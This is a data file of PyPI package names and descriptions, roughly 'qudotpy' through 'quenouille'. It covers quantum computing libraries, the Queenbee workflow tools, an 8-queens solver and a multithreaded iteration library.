can emulate quantum circuits.To help you get started we have written a detailed usage tutorial that covers most aspects of QuDotPy. The tutorial can be found here: QuDotPy TutorialQuDotPy depends on Numpy. You will need to have Numpy installed before you can use QuDotPy.Getting Started===============QuDotPy depends on Python 3 and is specifically tested against Pythong 3.6.5You can test by running the unit tests in the parent qudotpy directory```python -m unittest qudotpy.test_qudotpy``````$ python>>> from qudotpy import qudot>>> print qudot.apply_gate(qudot.H, qudot.ZERO)(0.707106781187+0j)|0> + (0.707106781187+0j)|1>>>>```That's it! For more check out our tutorial: QuDotPy Tutorial"} +{"package": "qudpy", "pacakge-description": "QuDPy:A simple package for nonlinear spectroscopy with quantum dynamics provided by qutip.See example_calculations for a detailed example."} +{"package": "qudra", "pacakge-description": "qudraQuantum Energy ManagementMotivationLeveraging quantum advantage to distributed grids for energy security and sustainability.Please check out these slides for moreinformation.InstallationOur team's contribution is supposed to go into thequdrafolder. So move therecd qudraConda users, please make sure toconda install pipbefore running any pip installation if you want to installqudrainto your conda environment.qudrais published on PyPI. So, to install, simply run:pipinstallqudraIf you also want to download the dependencies needed to run optional tutorials, please usepip install qudra[dev]orpip install 'qudra[dev]'(forzshusers).To check if the installation was successful, run:>>>importqudraBuilding from sourceTo buildqudrafrom source, pip install using:gitclonehttps://github.com/Q-Energy-2022/qudra.gitcdqudra\npipinstall--upgrade.If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installqudrain editable mode as follows:gitclonehttps://github.com/Q-Energy-2022/qudra.gitcdqudra\npipinstall-e.[dev]python3 -m venv venv\n. 
venv/bin/activate\nPlease usepip install -e '.[dev]'if you are azshuser.Building documentation locallySet yourself up to use the[dev]dependencies. Then, from the command line run:mkdocsbuildThen, when you're ready to deploy, run:mkdocsgh-deployAcknowledgementsCore Devs:Asil Qraini,Fouad Afiouni,Gargi Chandrakar,Nurgazy Seidaliev,Sahar Ben Rached,Salem Al Haddad,Sarthak Prasad MallaMentors:Akash Kant,Shantanu JhaThis project was created at the2022 NYUAD Hackathonfor Social Good in the Arab World: Focusing on Quantum Computing (QC)."} +{"package": "qudth", "pacakge-description": "Qudth randomly samples the lines within a large file and calculates statistics\nabout each line. For example, in a 10-gigabyte text file, you might want to know\nhow long a typical line is.Line lengthsIt would be very convenient if line length is what you are interested in, as\nthat is the only thing we implement right now.$ qudth qudth/cli.py -n 5 --bins 8\n\n\u2581 \u2581 \u2582 \u2581 \u2581 \u2581 \u2583 \u2583\n01 52 59\nLengths of 5 lines in qudth/cli.py\n(simple random sample with replacement)Benchmarkingwc-lis equivalent to qudth\u2019s line length estimation,\nbut qudth\u2019s sampling makes it much faster\non large files.big-file.csvis 1 gigabyte in size._:~ t$ time qudth big-file.csv > /dev/null\n\nreal 0m0.287s\nuser 0m0.161s\nsys 0m0.032s\n_:~ t$ time wc -l big-file.csv > /dev/null\n\nreal 0m2.515s\nuser 0m1.475s\nsys 0m0.440sFuture workA more standard thing would perhaps be something that emitted\na random sample to stdout. It could support different sampling\nstrategies perhaps."} +{"package": "que", "pacakge-description": "Slice and dice html on the command line using CSS selectors.Quick startLet\u2019s say you want to grab all the links onhttp://example.com/foo/bar:$ curl http://example.com/foo/bar | que \"a->href\"Let\u2019s say that gave you 3 lines that looked like this:/some/url?val=1\n/some/url2?val=2\n/some/url3?val=3Ugh, that\u2019s not very helpful, so let\u2019s modify our argument a bit:$ curl http://example.com/foo/bar | que \"a->http://example.com{href}\"Now, that will print:http://example.com/some/url?val=1\nhttp://example.com/some/url2?val=2\nhttp://example.com/some/url3?val=3SelectingNot sure how to use CSS Selectors?Beautiful Soup CSS select\ndocsJQuery\u2019s CSS Selector\ndocsThe selector is divided into two parts separated by->, the first\npart is the traditional selector talked about in the above links and the\nsecond part is the attributes you want to print to the screen for each\nmatch:$ css.selector->attribute,selectorThe Selector part usesPython\u2019s string formatting\nsyntaxso\nyou can embed the attributes you want within a larger string.ExamplesFind all the \u201cDownload\u201d links on a page:que has support for the the non-standard:contains css\nselector$ curl http://example.com | que \"a:contains(Download)->href\"Select all the links with attributedatathat starts with \u201cfoo\u201d:$ curl http://example.com | que \"a[data|=foo]->href\"InstallationYou can use pip to install stable:$ pip install queor the latest and greatest (which might be different than what\u2019s onpypi:$ pip install git+https://github.com/jaymon/que#egg=queNotesIf you need a way more fully featured html command line parser, tryhq."} +{"package": "quearcode", "pacakge-description": "Convert strings and small files to QR Codes"} +{"package": "queasars", "pacakge-description": "QUEASARS - Quantum Evolving Ansatz Variational SolverQUEASARS is an open-source, qiskit-based, python package implementing 
quantum variational eigensolvers which use evolutionary algorithms to find a good ansatz during the optimization process, likeE-VQE,MoG-VQEorQNEAT.Table of contentsInstallationUsageContributingMaintainersCopyright and licensesCopyrightLicenseInstallationUsing PipQUEASARS requires a python3 environment with python >= 3.9 and can be installed using the following pip command:pip install queasarsFrom SourceQUEASARS' development dependencies are managed usingpoetry.\nTo install QUEASARS from source follow these instructions:Clone the QUEASARS repository.Install Python 3.11Install poetry (installation guide).Runpoetry installfrom within QUEASARS' project directory to install its dependencies.UsageContributingContributions to this project are welcome. You may open issues, fix or expand documentation, provide new functionality or create more and better tests. If you have a minor contribution you can open a pull request right away. For any major contribution please open an issue first or discuss with the repository maintainer. Please also note that you need to fill out and sign acontributor license agreementMaintainersThe current Maintainers of QUEASARS areSven Pr\u00fcfer (@svenpruefer)andDaniel Leidreiter (@dleidreiter).Copyright and licenseCopyrightQuantum Evolving Ansatz Variational Solver (QUEASARS)Copyright 2023 DLR - Deutsches Zentrum f\u00fcr Luft- und Raumfahrt e.V.This product was developed at DLR - GSOC (German Space Operations Center at the German Aerospace Center DLR,https://www.dlr.de/).LicenseQUEASARS is licensed under theApache License, Version 2.0."} +{"package": "quebert", "pacakge-description": "UNKNOWN"} +{"package": "quebra-frases", "pacakge-description": "No description available on PyPI."} +{"package": "quecital", "pacakge-description": "No description available on PyPI."} +{"package": "queclinkdoc", "pacakge-description": "Queclinkdoc is a simple, clean, and less-configured theme for theSphinxdocumentation system developed byQueclink Wireless Solutions Co., Ltd.We show the globalTOCtree of the documentation in a drop-down list at the head of the page, and even if you browse to the end of the page, this TOC tree will still be fixed at the head, so you can jump to other pages at any time.We recommend usingGoogle ChromeorFirefoxto read the generated documentation.You can make and installqueclinkdoctheme like this:pysetup.pysdistpy-mpipinstalldist\\queclinkdoc-x.x.tar.gzWhen using therefdirective to jump to the top of the page, for a good experience, please name the label at the top of the page withheadlabel-as a prefix, for example:1 .. _headlabel-page-title:\n2\n3 Page Title\n4 ===========\n5In addition, this theme supports the following custom HTML options:toc_background_colorUsed to specify the background color of the title area at the head of the page, the default is Blue (#2B579A), for example, you can change it to Green like this:html_theme_options = {\n 'toc_background_color': '#008080',\n}zoomout_asizeCan betrueorfalse, default istrue. The font size of the tag whose first character is a capital letter will be reduced to 0.95em when it is true, and will not be reduced when it is false. 
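Once installed, the theme is normally selected in the project's conf.py before any of its options are set; a minimal sketch, assuming the theme is registered under the same name as the package:

```python
# conf.py -- hypothetical; assumes the theme name matches the package name
html_theme = 'queclinkdoc'
```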
You can change it to false like this:html_theme_options = {\n 'zoomout_asize': 'false',\n}snapshot.pngis a snapshot of thequeclinkdoctheme.If you have any questions or suggestions, please contact us, thanks in advance."} +{"package": "quecto", "pacakge-description": "quecto-pyQuecto-py is a simple and official wrapper of Quecto, an open-source and self-hostable solution for link shortening.InstallationpipinstallquectoUsageShorten a linkfromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.shortUrl(\"https://example.com\",\"password\")# password is optionalprint(r)# https://s.oriondev.fr/s/189d28e9b9ae6Unshorten a linkfromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.unshortUrl(\"https://s.oriondev.fr/s/189d28e9b9ae6\",\"password\")# password is optionalprint(r)# https://example.comCheck if the domain is a valid Quecto instancefromquectoimportQuectoclient=Quecto(\"https://s.oriondev.fr\")r=client.isValidInstance()print(r)# TrueContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.LicenseGPL3"} +{"package": "queen", "pacakge-description": "UNKNOWN"} +{"package": "queen8", "pacakge-description": "UNKNOWN"} +{"package": "queenbee", "pacakge-description": "Queenbee :crown:Queenbee is a workflow language for describing workflows! The workflow Schema\nis inspired byArgo Workflowand\nborrows a number of terms and expressions fromApache AirflowandAnsible.Queenbee populates and validates the workflows but does not run them! For running the\nworkflows seeladybug-tools/queenbee-luigiwhich converts Queenbee workflows to executableLuigipipelines.You can find more workflow samples inhoneybee-radiance-workflowrepository.Installation> pip install queenbeeor if you want to use the CLI> pip install queenbee[cli]DocumentationYou can access the full docs for this package and its CLIhere.You can also access theSchema\nDocumentationand\nOpenAPI documentation for:ObjectRedocOpenAPI JSONPluginredocjsonReciperedocjsonJobredocjsonLocal DevelopmentClone this repo locallygit clone git@github.com:ladybug-tools/queenbeeorgit clone https://github.com/ladybug-tools/queenbeeInstall dependencies:cd queenbeepip install -r dev-requirements.txtpip install -r requirements.txtRun Tests:python -m pytest tests/Generate Documentation:sphinx-apidoc-f-e-d4-o./docs/modules./queenbeesphinx-build-bhtml./docs./docs/_buildPreview Documentation:python -m http.server --directory ./docs/_build/Now you can see the documentation preview athttp://localhost:8000"} +{"package": "queenbee-dsl", "pacakge-description": "queenbee-python-dslA Python Domain Specific Language (DSL) to create Queenbee Plugins and Recipes as Python\nobjects.API docsQueenbee-DSL API docsRequirementsPython >=3.7InstallationClone this repository.Change directory to root folder of the repository.pip install .Quick StartIf you are interested to start writing your own plugins and recipe see theintroduction post.Functionfromdataclassesimportdataclassfromqueenbee_dsl.functionimportFunction,command,Inputs,Outputs@dataclassclassCreateOctreeWithSky(Function):\"\"\"Generate an octree from a Radiance folder and sky!\"\"\"# inputsinclude_aperture=Inputs.str(default='include',description='A value to indicate if the static aperture should be included in ''octree. Valid values are include and exclude. Default is include.',spec={'type':'string','enum':['include','exclude']})black_out=Inputs.str(default='default',description='A value to indicate if the black material should be used. 
Valid ''values are default and black. Default value is default.',spec={'type':'string','enum':['black','default']})model=Inputs.folder(description='Path to Radiance model folder.',path='model')sky=Inputs.file(description='Path to sky file.',path='sky.sky')@commanddefcreate_octree(self):return'honeybee-radiance octree from-folder model --output scene.oct '\\'--{{self.include_aperture}}-aperture --{{self.black_out}} '\\'--add-before sky.sky'# outputsscene_file=Outputs.file(description='Output octree file.',path='scene.oct')The Queenbee class is accessible fromqueenbeeproperty.\nTryprint(CreateOctreeWithSky().queenbee.yaml())and you should see the full Queenbee\ndefinition:type:Functionannotations:{}inputs:-type:FunctionStringInputannotations:{}name:black-outdescription:A value to indicate if the black material should be used. Valid valuesare default and black. Default value is default.default:defaultalias:[]required:falsespec:type:stringenum:-black-default-type:FunctionStringInputannotations:{}name:include-aperturedescription:A value to indicate if the static aperture should be included in octree.Valid values are include and exclude. Default is include.default:includealias:[]required:falsespec:type:stringenum:-include-exclude-type:FunctionFolderInputannotations:{}name:modeldescription:Path to Radiance model folder.default:nullalias:[]required:truespec:nullpath:model-type:FunctionFileInputannotations:{}name:skydescription:Path to sky file.default:nullalias:[]required:truespec:nullpath:sky.skyextensions:nulloutputs:-type:FunctionFileOutputannotations:{}name:scene-filedescription:Output octree file.path:scene.octname:create-octree-with-skydescription:Generate an octree from a Radiance folder and sky!command:honeybee-radiance octree from-folder model --output scene.oct --{{inputs.include-aperture}}-aperture--{{inputs.black-out}} --add-before sky.skySince the functions are standard Python classes you can also subclass them from one\nanother.PluginTo create a Queenbee plugin use the functions to create a standard Python module. The only\nchange is that you need to provide the information for Queenbee plugin in the__init__.pyfile as dictionary assigned to__queenbee__variable.In the near future we might be able to use Python package's information to collect most\nof these information.Follow the standard way to install a Python package. Once the package is installed you\ncan usequeenbee-dslto load the package or write it to a folder.fromqueenbee_dsl.packageimportload,write# name of the queenbee packagepython_package='pollination_honeybee_radiance'# load this package as Queenbee Pluginplugin=load(python_package)# or write the package as a Queenbee plugin to a folder directlywrite(python_package,'./pollination-honeybee-radiance')Seepollination-honeybee-radiancepluginfor a full project example.RecipeRecipeis a collection ofDAGs. 
EachDAGis a collection of interrelatedtasks.\nYou can use queenbee-dsl to create complex recipes with minimum code by reusing thefunctionsas templates for each task.Packaging a plugin is exactly the same as packaging a plugin.fromqueenbee_dsl.packageimportload,translate# name of the queenbee packagepython_package='daylight-factor'# load this package as Queenbee Reciperecipe=load(python_package,baked=True)# or translate and write the package as a Queenbee plugin to a folder directlytranslate(python_package,'./daylight-factor')Seedaylight factorrecipefor a full project example.How to create a queenbee-dsl packageQueenbee-dsl uses Python's standard packaging to package queenbee plugins and recipes.\nIt parses most of the data from inputs insetup.pyfile and some Queenbee specific\ninformation from__init__.pyfile. Below is an example of how these file should look\nlike.setup.py#!/usr/bin/env pythonimportsetuptools# These two class extends setup.py to install the packages as queenbee packagesfromqueenbee_dsl.packageimportPackageQBInstall,PackageQBDevelop# Read me will be mapped to readme stringswithopen(\"README.md\",\"r\")asfh:long_description=fh.read()setuptools.setup(cmdclass={'develop':PackageQBDevelop,'install':PackageQBInstall},# required - include this for queenbee packagingname='pollination-honeybee-radiance',# required - will be used for package name unless it is overwritten using __queenbee__ key in __init__.pyversion='0.1.0',# required - will be used as package tag. you can also use semantic versioningurl='https://github.com/pollination/pollination-honeybee-radiance',# optional - will be translated to homedescription='Honeybee Radiance plugin for Pollination.',# optional - will be used as package descriptionlong_description=long_description,# optional - will be translated to ReadMe content on Pollinationlong_description_content_type=\"text/markdown\",author='author_1',# optional - all the information for author and maintainers will beauthor_email='author_1@example.com',# translated to maintainers. For multiple authors use commamaintainer='maintainer_1, maintainer_2',# inside the string.maintainer_email='maintainer_1@example.come, maintainer_2@example.com',packages=setuptools.find_packages('pollination_honeybee_radiance'),# required - standard python packaging input. not used by queenbeekeywords='honeybee, radiance, ladybug-tools, daylight',# optional - will be used as keywordslicense='PolyForm Shield License 1.0.0, https://polyformproject.org/wp-content/uploads/2020/06/PolyForm-Shield-1.0.0.txt'# optional - the license link should be separated by a comma)init.pyHere is an example__init__.pyfor a plugin.__queenbee__={'name':'honeybee-radiance',# optional - new name for queenbee package. this will overwrite the Python package name'icon':'https://ladybug.tools/assets/icon.png',# optional - package icon'config':{# required for Pollination - docker information for this specific plugin'docker':{'image':'ladybugtools/honeybee-radiance:1.28.12','workdir':'/home/ladybugbot/run'}}}Here is an example__init__.pyfor a recipe.from.entryimportAnnualDaylightEntryPoint__queenbee__={'name':'annual-daylight',# optional - new name for queenbee package. 
this will overwrite the Python package name'icon':'https://ladybug.tools/assets/icon.png',# optional - package icon'entry_point':AnnualDaylightEntryPoint,# required - this will point queenbee to the class that should be used to start the run}"} +{"package": "queenbee-local", "pacakge-description": "queenbee-localQueenbee task provides a helper module for running queenbee recipes on a local machineInstallationpip install queenbee-localQuickStartimportqueenbee_local"} +{"package": "queenbee-pollination", "pacakge-description": "queenbee-pollinationqueenbee-pollination extendsqueenbeein order to interact with thePollination API.InstallationYou can install this as a cli tool using the following command:pip install queenbee-pollination[cli]CLI QuickStartAuthenticationThe CLI tool will authenticate to the Pollination API in one of two ways:Env VarsSet the following environment variable as your API token before running commandsQB_POLLINATION_TOKEN.Example for a bash shell:> export QB_POLLINATION_TOKEN=> queenbee pollination project simulations list --project test-project --owner ladybug-toolsQueenbee ConfigRe-use pollination auth set in your queenbee config. You can do so by using this command:> queenbee config auth add pollination YOUR_POLLINATION_API_KEYPushYou can push recipes and operators to the Pollination platform to share them with others or use them within simulations.To push a recipe calledmy-cool-recipeto Pollination platform use:> queenbee pollination push recipe path/to/my-cool-recipeYou can push a recipe or operator too a specific pollination account by specifying the--ownerflag. You can overwrite the resource's tag by using the--tagflag. Here is an example of pushing thehoneybee-radianceoperator to theladybug-toolsaccount and specifying a tag ofv0.0.0.> queenbee pollination push operator ../garden/operators/honeybee-radiance --tag v0.0.0 --owner ladybug-toolsPullYou can pull recipes and operators from Pollination onto your machine by using thepullcommands.You can pull the latest version ofmy-cool-recipefrom your pollination account by running:> queenbee pollination pull recipe my-cool-recipeYou can pull thehoneybee-radianceoperator from theladybug-toolsaccount and tagv0.0.0by running:> queenbee pollination pull operator honeybee-radiance --owner ladybug-tools --tag v0.0.0Note:You can specify a folder to download the recipe/operator to by specifying the--pathoption flag.ProjectsThe project section of the CLI lets users upload files to a project and schedule simulations.FolderA user can upload or delete files in a project folder. To do so use the following commands:UploadYou can upload artifacts to a project calledtest-projectectby using this command:> queenbee pollination project upload path/to/file/or/folder --project test-projectectYou can upload artifacts to a project belonging to another user or org:> queenbee pollination project upload path/to/file/or/folder --project test-projectect --owner ladybug-toolsDeleteYou can delete all files in a project folder:> queenbee pollination project delete --project test-projectectYou can delete specific files in a project folder:> queenbee pollination project delete --project test-projectect --path some/subpath/to/a/fileSimulationsFor a given project you can list, submit or download simulations.List> queenbee pollination project simulation list -p test-projectectSubmitYou can submit a simulation without needing to specify any inputs (if the simulation does not require any!). 
The recipe to be used is specified in the following format {owner}/{recipe-name}:{tag}:> queenbee pollination project simulation submit chuck/first-test:0.0.1 -p demo. If you want to specify inputs you can point to an inputs file (json or yaml) which must represent a Queenbee Workflow Argument object.> queenbee pollination project simulation submit ladybug-tools/daylight-factor:latest --project demo --inputs path/to/inputs.yml. Download. Once a simulation is complete you can download all inputs, outputs and logs to your machine. Here is an example downloading data from a simulation with an ID of 22c75263-c8ba-42d0-a1b8-bd3107eb6b51 from a project with name demo by using the following command:> queenbee pollination project simulation download --project demo --id 22c75263-c8ba-42d0-a1b8-bd3107eb6b51"} +{"package": "queenin", "pacakge-description": "No description available on PyPI."} +{"package": "queen-pkg", "pacakge-description": "Hi\n\nThis is trial."} +{"package": "queens8", "pacakge-description": "queens8 Package 0.1.2, last change 25-Apr-2022. Introduction to the n Queens and 8 Queens problem. In the 19th century the n Queens puzzle was formulated. The aim of the puzzle was to place\nn Chess Queens on an n x n chessboard such that no Queen attacks any other Queen. That is, every row, every\ncolumn and every diagonal has no more than one of the n Queens placed in that row, column or diagonal. In 1848 Chess Master Max Bezzel proposed the problem for n=8, the Chess Board we are all familiar with.\nIn 1850 Franz Nauck extended the problem to other n x n Chess boards, as well as publish solutions to the 8 x 8\nvariant. Many mathematicians of the time worked on this, including the esteemed Karl Friedrich Gauss. With the advent of structured programming Edsger Dijkstra wrote a program to solve this problem for n=8, with a method\nknown as depth first backtracking. The Dijkstra solution also had an elegant method of characterizing the diagonals. In his program the user chooses which column the Queen on the first row occupies and the program looks for the first\nsolution in placing the other 7 Queens. Column Number / Chess Notation: 1 - Queens Rook 1; 2 - Queens Knight 1; 3 - Queens Bishop 1; 4 - Queen 1; 5 - King 1; 6 - Kings Bishop 1; 7 - Kings Knight 1; 8 - Kings Rook 1. Symmetry. When you run this the careful observer will notice the solutions 1 and 8 are really the same, with\nthere only being a rotation of the board between them. You might also observe 2 and 6 are the same\nwith a rotation between them. A fundamental solution is the set of a solution with all symmetric solutions to that solution. A symmetric\nsolution is either a rotation or a reflection. There is one solution which is exactly equal to its reflection,\nso it has no reflections. There are three counter clockwise rotations, that of 90, 180 and 270 degrees. A horizontal reflection is a reflection around the line which\nlies between the King and Queen columns. A vertical reflection is around the line between the 4th and 5th rows.\nThere are also reflections around the longest up diagonal and the longest down diagonal.
Both of these diagonal\nreflections together are a reflection about the center point of the board.Any composition of these operations is again another symmetry.\nWe keep putting new ones in until there are no new symmetries.The Dijikstra Wirth algorithm.The Dijikstra algorithm has a set of flags one for every row, every column, every Up Diagonal and every Down Diagonal.\nThis make 8 rows, 8 columns, 15 Up Diagonals and 15 Down diagonals. The Up Diagonals are characterized by K = Row + Column.\nK characterizes the diagonal with K in {2 .. 16}. The DownDiagonals are characterized by K = Row - Column. K\ncharacterizes the diagonal with K in {-7 .. 7}. The diagonal flags (as well as row and column) are lists of flags. The\ndiagonal are lists of length 17. The negative indexes for Down Diagonals work well with Python these being the distance from the\nend of the list.This package has 4 different functions.This package has 4 different functions which are sellected by menu:The fundamental Dijikstra algorithm with a Graphics like board display.A search for all fundamental solutions, that is pruning symmetries.The Dijikstra algorithm showing the board and all symmetrical boards.Showing which Dijikstra soloutiions are symmetric to each other as sets.The Pseudo graphical board display.The board is shown by using tkinter. The root frame contains 8 frames, each of which is a row.\nEach row is 8 characters. The Empty square is a Unicode '\\u3000' because an ascii space is not\nsized right. The color of the square is the background color. White Queens '\\u2665' are queens\non black squares and Black Queens '\\u265b' are placed on white squares for good contrasts. An example of\nboard for 1 and 8 are in the section labeled symmetry. The board or boards\nremain until the \"Enter to Proceed!\" is replied to. Then the boards are destroyed.Installing Queens8.The simplest method : pip install queens8Running Queens8.#!python\n\nfrom queens8 import Queens8\n\nQueens8.Go()Queens8 will then prompt:A : The orginal Dijkstra and Wirth solution to the 8 queens problem.\nB : Do all solutions with no symmetries\nC : Like Queens8 only show the symmetries too\nE : Of the 8 returned by Queens8 as equivalence sets (no graphics)\nQ : To Quit \nX : Same as Q\nselect:qA Q or an X followed by enter will exit queens8.An A or a will prompt for a column on row 1 to place the first queen. All the steps in\nthe depth first backtracking search will be displayed. The final board will be displayed also.On which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:5\n 1: Place Queen 1 on Row 5\n 2: Place Queen 2 on Row 1\n 3: Place Queen 3 on Row 4\n 4: Place Queen 4 on Row 6\n 5: Place Queen 5 on Row 3\n 5: Take Queen 5 from row 3\n 7: Place Queen 5 on Row 8\n 8: Place Queen 6 on Row 2\n 9: Place Queen 7 on Row 7\n 10: Place Queen 8 on Row 3\n2 6 8 3 1 4 7 5 \nEnter to Proceed\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:0The B entry shows all 12 fundamental solutions. Each board representing all\nsymmetries. 
This prompts for the choice to see the 12 boards or for a text line\nshowing each column for each row for each solution.select:b\nDisplay Queens Y or N?y\nNumber of Distinct Solutions = 12 Total Solutions = 92\nEnter to Proceed!The C entry is like the A entry, except that the board and all symmetric boards\nare displayed!select:c\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:5\nEnter to Continue\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:0The D entry shows for for the Dijkstra solutions, which ones are really the same\nfundamental solutions.select:e\n{1, 8}\n{2, 6}\n{3}\n{4}\n{5}\n{7}For each of the 8 solutions a set of all symmetric solutions is made. The program\nlooks for which one are disjoint, O(n^2^) process.Look For:This subject is also discussed in a book I have written. I will update this 'README.md'\nwhen the book is published."} +{"package": "queensbarry", "pacakge-description": "No description available on PyPI."} +{"package": "que_es", "pacakge-description": "No description available on PyPI."} +{"package": "queick", "pacakge-description": "QueickA simple inmemory job-queue manager for Python.FeatureWritten in Python only standard librariesJob-queue managerwithout redisWorking for low-spec machinesRetryRetry on network availableSchedulingInstallationPython version >= 3.6 is required.pip install queickUsageFirst, launch queick worker.$ queickSecond, prepare a job file (jobfunc.py) and an application (test.py).# jobfunc.pyimporttimedeffunction(arg):time.sleep(1)print(arg)# test.pyfromqueickimportJobQueuefromjobfuncimportfunctionfromtimeimporttimeq=JobQueue()q.enqueue(function,args=(\"hello\",))q.enqueue_at(time()+5,function,args=(\"world\",))# Run after 5 secondsst=SchedulingTime()st.every(minutes=1).starting_from(time.time()+10)q.cron(st,function,args=(1,2,))# Run after 10 seconds and every 1 minuteThird, run the application.$ python test.pyRetry on network availableJobs inside thefailed queuewill be dequeued when the network status changes from disconnected to connected.Some setups are needed to use the retry mode. First, launch queick worker with --ping-host options (details below).$ queick --ping-host asmsuechan.com # Please prepare your own ping server, do not use this.Second, pass an option to the method.q.enqueue(function,args=(\"hello\",),retry_on_network_available=True)OptionsThere are some options for queick worker.namedefaultdescription-debugFalseif set, detailed logs will be shown--ping-hostNonehostname for NetworkWatcher to check if the machine has the internet connection--ping-port80port number for NetworkWatcher--log-filepathNonelogfile to save all the worker logAn example usage is below:$ queick -debug --ping-host asmsuechan.comTestingUnit test:$ python -m unittestIntegration test:$ docker build -t queick-test .\n$ docker run --rm -it queick-test:latestDevelopmentBuild queick for development.$ python setup.py developDeploymentDeployed athttps://pypi.org/project/queick/.$ python setup.py sdist\n$ twine upload dist/*"} +{"package": "quelfilm-chatbot-app", "pacakge-description": "No description available on PyPI."} +{"package": "quenouille", "pacakge-description": "QuenouilleA library of multithreaded iterator workflows for python.It is typically used to iterate over lazy streams without overflowing memory, all while respecting group parallelism constraints and throttling, e.g. 
when downloading massive amounts of urls from the web concurrently.It is mainly used by theminetpython library and CLI tool to power its downloaders and crawlers.InstallationYou can installquenouillewith pip using the following command:pip install quenouilleUsageimap, imap_unorderedThreadPoolExecutor#.imap, #.imap_unordered#.shutdownNamedLocksMiscellaneous notesThe None groupParallelism > workersCallable parallelism guaranteesParallelism vs. throttlingAdding entropy to throttleCaveats regarding exception raisingCaveats of using imap with queuesimap, imap_unorderedFunction lazily consuming an iterable and applying the desired function over the yielded items in a multithreaded fashion.This function is also able to respect group constraints regarding parallelism and throttling: for instance, if you need to download urls in a multithreaded fashion and need to ensure that you won't hit the same domain more than twice at the same time, this function can be given proper settings to ensure the desired behavior.The same can be said if you need to make sure to wait for a certain amount of time between two hits on the same domain by using this function's throttling.Finally note that this function comes in two flavors:imap_unordered, which will output processed items as soon as they are done, andimap, which will output items in the same order as the input, at the price of slightly worse performance and an increased memory footprint that depends on the number of items that have been processed before the next item can be yielded.importcsvfromquenouilleimportimap,imap_unordered# Reading urls lazily from a CSV file using a generator:defurls():withopen('urls.csv')asf:reader=csv.DictReader(f)forlineinreader:yieldline['url']# Defining some functionsdeffetch(url):# ... e.g. use urllib3 to download the url# remember this function must be threadsafereturnhtmldefget_domain_name(url):# ... e.g. use ural to extract domain name from urlreturndomain_name# Performing 10 requests at a time:forhtmlinimap(urls(),fetch,10):print(html)# Ouputting results as soon as possible (in arbitrary order)forhtmlinimap_unordered(urls(),fetch,10):print(html)# Ensuring we don't hit the same domain more that twice at a timeforhtmlinimap(urls(),fetch,10,key=get_domain_name,parallelism=2):print(html)# Waiting 5 seconds between each request on a same domainforhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=5):print(html)# Throttle time depending on domaindefthrottle(group,item,result):ifgroup=='lemonde.fr':return10return2forhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=throttle):print(html)# Only load 10 urls into memory when attempting to find next suitable jobforhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=5,buffer_size=10):print(html)Argumentsiterable(iterable): Any python iterable.func(callable): Function used to perform the desired tasks. The function takes an item yielded by the given iterable as single argument. Note that since this function will be dispatched in worker threads, so you should ensure it is thread-safe.threads(int, optional): Maximum number of threads to use. Defaults tomin(32, os.cpu_count() + 1). Note that it can be0, in which case no threads will be used and everything will run synchronously (this can be useful for debugging or to avoid duplicating code sometimes).key(callable, optional): Function returning to which \"group\" a given item is supposed to belong. 
This will be used to ensure maximum parallelism is respected.parallelism(int or callable, optional)[1]: Number of threads allowed to work on a same group at once. Can also be a function taking a group and returning its parallelism.buffer_size(int, optional)[1024]: Maximum number of items the function will buffer into memory while attempting to find an item that can be passed to a worker immediately, all while respecting throttling and group parallelism.throttle(int or float or callable, optional): Optional throttle time, in seconds, to wait before processing the next item of a given group. Can also be a function taking last group, item and result and returning next throttle time for this group.block(bool, optional)[False]: Whether to block when using thegetmethod of the given queue.panic(callable, optional): Function that will be called when the process has errored. Useful to unblock some functions and avoid deadlock in specific situations. Note that this function will not be called when synchronous (i.e. when not using additional threads).initializer(callable, optional): Function to run at the start of each thread worker. Can be useful to setupthread-local data, for instance. Remember this function must be threadsafe and should not block because the thread pool will wait for each thread to be correctly booted before being able to proceed. If one of the function calls fails, the thread pool will raise aquenouille.exceptions.BrokenThreadPoolerror and terminate immediately.initargs(iterable, optional): Arguments to pass to theinitializerfunction.wait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when shutting down the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.daemonic(bool, optional)[False]: whether to spawn daemonic worker. If your worker are daemonic, the interpreter will not wait for them to end when exiting. This can be useful, combined towait=False, for instance, if you want your program to exit as soon as hitting ctrl+C (you might want to avoid this if your threads need to cleanup things on exit as they will be abruptly shut down).Using a queue rather than an iterableIf you need to add new items to process as a result of performing tasks (when designing a web crawler for instance, where each downloaded page will yield new pages to explore further down), know that theimapandimap_unorderedfunction also accepts queues as input:fromqueueimportQueuefromquenouilleimportimapjob_queue=Queue()job_queue.put(1)# Enqueuing new jobs in the workerdefworker(i):ifi<3:job_queue.put(i+1)returni*2list(imap(job_queue,worker,2))>>>[2,4,6]# Enqueuing new jobs while iterating over resultsjob_queue=Queue()job_queue.put(1)results=[]foriinimap(job_queue,worker,2):ifi<5:job_queue.put((i/2)+1)results.append(i)results>>>[2,4,6]Note thatimapwill only run until the queue is fully drained. 
